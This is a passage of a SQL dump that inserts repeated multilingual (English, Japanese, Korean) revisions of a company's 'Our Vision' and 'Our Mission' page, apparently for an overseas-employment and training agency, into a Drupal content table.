style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoListParagraph\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 238, 'en', 0, '<img data-entity-uuid=\"41966a19-134b-450b-9bc4-17e138bb169b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_1.jpg\" width=\"29.93%\" data-align=\"left\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 238, 'ja', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_2.jpg\" data-align=\"left\" data-entity-uuid=\"660bf351-a3d0-4bc7-9799-6b728a87a97e\" data-entity-type=\"file\" width=\"29.26%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 238, 'ko', 0, '<blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoListParagraph\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 239, 'en', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_1.jpg\" data-align=\"left\" data-entity-uuid=\"41966a19-134b-450b-9bc4-17e138bb169b\" data-entity-type=\"file\" width=\"29.92%\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 239, 'ja', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_2.jpg\" data-align=\"left\" data-entity-uuid=\"660bf351-a3d0-4bc7-9799-6b728a87a97e\" data-entity-type=\"file\" width=\"29.26%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 25, 239, 'ko', 0, '<blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun 